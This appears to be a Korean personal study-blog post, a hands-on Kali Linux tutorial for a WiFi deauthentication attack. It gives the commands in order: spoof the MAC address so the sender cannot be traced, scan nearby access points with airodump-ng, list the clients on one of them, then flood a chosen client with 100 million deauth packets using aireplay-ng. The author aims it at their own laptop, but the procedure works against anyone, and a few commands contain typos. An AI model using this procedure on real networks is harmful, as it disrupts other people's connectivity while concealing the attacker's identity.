본문 바로가기

데일리 공부 기록

hands on 칼리리눅스 해킹 - wifi 사용자에게 대량 패킷 보내어 접속 끊기

728x90

[개요]

1- 추적 불가능을 위해 MAC주소 변경

2- 현재 주위의 WIFI 확인

3- 특정 WIFI에 연결된 기기들 확인

4- 연결된 기기 중 하나를 대량의 패킷을 보내어 연결이 끊기게 만들기


1. 자신의 맥주소를 확인하여 변경하기

다음 사진은 현재 내 고유 MAC주소이다.

 

client(wifi 사용자 中 한명)에게 대량의 패킷을 보내어 접속이 끊기게 하려는게 목적이다.

그러려면 어떤 사람이 보냈는지 알 수 없게 하여야 한다.

MAC주소를 변경하여 한다.

 

다음 명령어를 순서대로 입력하여 MAC주소를 변경하자

1-1) ifconfig wlan0 down (설정을 위해 연결된 wifi 라인을 해제한다.)

1-2) ifconfig hw ether 00:11:22:33:44:55 (맥주소를 00:11:22..(생략) 로 변경한다)

1-3) ifconfig wlan up (재 설정을 한 wifi 라인을 다시 연결한다.)

1-4 ) ifconfig (MAC주소가 변경되었는지 확인한다.


2. 주변의 WIFI 확인하기

다음 명령을 입력하여 WIFI 를 확인하자

airodump-ng --band a wlan0 (wlan0이 탐지 가능한 모든 wifi 검색)

오른쪽 빨간 박스는 주변에 있는 WIFI access point이다.

왼쪽 빨간 박스는 와이파이의 MAC주소이다.

 

MAC주소를 이용하여 해당 MAC주소 와이파이에 연결된 모든 기기를 확인해보자

2-1) airodump-ng --bssid 와이파이맥주소 --channel 5 wlan0(wlan0이 검색한 와이파이맥주소의 채널5에 연결된 기기를 보여줘 라는 의미)

왼쪽 빨간박스(와이파이맥주소)에 연결된 기기의 MAC주소는

STATION 칼럼에 나와있다.

 

내 노트북에서 MAC 주소를 확인해보자

 

ipcofig /all 라고 명령어를 친다.

54-8D..로 시작하는 MAC 주소가 내 노트북 주소이다.

내 노트북에게 다량의 패킷을 보내어 인터넷이 끊기게 만들어보자

 

3) 다음 명령을 통해 다량의 패킷을 보내본다

aireplay-ng --deauth 100000000 -a 00:23:AA:F5:62:CA -c 54:8D:5A:11:E8:E7 -D wlan0

설명-> deauth(인증하지 않은 패킷을) 1천만개를 router주소, client(내노트북)주소에 보낸다. 

멈추지 않고 보낸다. 

내 컴퓨터에서 인터넷을 접속하면 이렇게 나온다.

내가 직접 연결을 끊지도 않았는데 접속이 끊긴다.